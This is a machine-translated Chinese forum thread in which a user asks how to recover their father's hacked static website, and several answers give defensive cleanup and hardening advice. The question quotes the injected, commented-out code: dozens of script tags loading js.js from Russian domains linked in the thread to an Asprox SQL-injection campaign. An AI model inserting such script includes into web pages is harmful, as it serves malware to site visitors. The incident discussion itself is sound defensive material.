我的网站被黑了。我该怎么办?
我父亲今天给我打电话,说去他网站的人感染了168种试图下载到他们计算机上的病毒。他一点也不精通,并使用所见即所得的编辑器来构建整个程序。
我打开他的网站打开并查看了源代码,在源代码的底部,在关闭HTML标记之前有一行Javascript包含。他们包括了这个文件(以及许多其他文件):http://www.98hs.ru/js.js <-在转到该URL之前,请关闭JavaSCRIPTIP。
所以我暂时将其注释掉。事实证明,他的FTP密码是一个普通的字典单词,长度为6个字母,因此我们认为这就是被黑客入侵的方式。我们已将他的密码更改为8位以上的非单词字符串(由于他是hunt-n-peck打字员,因此他不会输入密码)。
我在98hs.ru上做了一个Whois,发现它是由智利的一台服务器托管的。实际上也有一个与之关联的电子邮件地址,但我严重怀疑此人是罪魁祸首。可能只是其他一些被黑客入侵的网站...
我现在不知道该怎么办,因为我以前从未处理过这类事情。有人有什么建议吗?
他正在通过webhost4life.com使用纯jane非安全ftp。我什至没有看到在他们的网站上执行sftp的方法。我在想他的用户名和密码被拦截了吗?
因此,为了使其与社区更相关,应采取哪些步骤/应采取的最佳做法来保护网站免遭黑客攻击?
作为记录,这是"神奇地"添加到他的文件中的代码行(并且不在他的计算机文件中-我将其注释掉只是为了确保绝对不会对它做任何事情此页面,尽管我确信Jeff会对此加以防范):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
解决方案
回答
拥有六个单词的密码,他可能被强行强行使用。这比拦截他的ftp更有可能,但也有可能。
从更强的密码开始。 (8个字符仍然相当弱)
查看此指向Internet安全博客的链接是否有帮助。
回答
尝试收集尽可能多的信息。查看主机是否可以为我们提供一条日志,显示与帐户建立的所有FTP连接。我们可以使用它们来查看是否甚至是用于进行更改并可能获得IP地址的FTP连接。
如果我们使用的是预装的软件,如Wordpress,Drupal或者其他未编写代码的软件,则上传代码中可能存在漏洞,允许进行此类修改。如果是自定义构建的,请仔细检查我们允许用户上传文件或者修改现有文件的所有位置。
第二件事是按原样转储该站点,并检查所有内容以进行其他修改。他们可能只是进行了一次修改,但是如果他们通过FTP进入,他知道那里还有什么。
将网站恢复为已知的良好状态,并在需要时将其升级到最新版本。
我们还必须考虑一定程度的回报。造成损失的价值值得尝试追踪这个人吗?或者这仅仅是我们生活,学习和使用更强密码的地方?
回答
该网站只是纯静态HTML吗?也就是说,他没有设法为自己编写一个上传页面,该页面不允许任何开车经过的人上传受到破坏的脚本/页面?
为什么不问webhost4life他们是否有任何FTP日志并向他们报告问题。我们永远不会知道,他们可能会很乐于接受,并为我们找出发生了什么事?
我为一家共享主机托管服务公司工作,我们始终欢迎此类报告,并且通常可以查明确切的攻击源,并就客户出了问题的地方提出建议。
回答
我们提到我们父亲正在使用网站发布工具。
如果发布工具从他的计算机发布到服务器,则可能是他的本地文件是干净的,而他只需要重新发布到服务器即可。
他应该查看服务器上是否有不同于普通FTP的登录方法,但这不是很安全,因为它通过Internet以明文形式发送密码。
回答
我知道这还差一点时间,但是JavaScript提到的URL在已知于6月份启动的ASPRox机器人复兴活动的一部分站点中被提及(至少那时候我们被标记为它)。以下是有关它的一些详细信息:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
令人讨厌的事情是,实际上数据库中的每个varchar类型字段都被"感染",以吐出对此URL的引用,在该URL中,浏览器得到一个很小的iframe,将其变成机器人。可以在这里找到基本的SQL修复程序:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
不过,令人恐惧的是,该病毒会在系统表中寻找要感染的值,并且许多共享的托管计划还为其客户端共享数据库空间。因此,很可能甚至不是我们父亲的站点被感染,而是他的托管群集中的其他人的站点编写了一些不良代码并为SQL Injection攻击打开了大门。
如果他还没有这样做,我会向他们的主机发送一封紧急电子邮件,并给他们一个指向该SQL代码的链接,以修复整个系统。我们可以修复自己的受影响的数据库表,但最有可能是正在进行感染的僵尸程序将再次通过该漏洞并感染整个感染对象。
希望这可以为我们提供更多信息。
编辑:再想一想,如果他使用主机在线设计工具之一来构建自己的网站,则所有这些内容可能都位于一栏中,并以这种方式被感染了。
回答
显然我们是被同一个人砍死的!在我们的情况下,还是机器人。他们在一些旧的经典ASP站点上的URL中使用了SQL注入,现在没人再维护了。我们发现了攻击IP,并在IIS中将其阻止。现在,我们必须重构所有旧的ASP。
因此,我的建议是先查看IIS日志,以查找问题是否出在我们网站的代码或者服务器配置中。
回答
拔出网络服务器的电源而不关闭它,以避免关闭脚本。通过另一台计算机将硬盘作为数据驱动器进行分析,看看是否可以通过日志文件和类似性质的东西来确定罪魁祸首。验证该代码是安全的,然后从备份中将其还原。
回答
这发生在最近由ipower托管的我的一个客户身上。我不确定托管环境是否基于Apache,但是否一定要仔细检查我们未创建的.htaccess文件,尤其是在webroot和映像目录内部时,因为它们倾向于在其中注入一些麻烦也是如此(他们根据引荐来源地将人重定向)。还要检查我们为未编写的代码创建的任何内容。
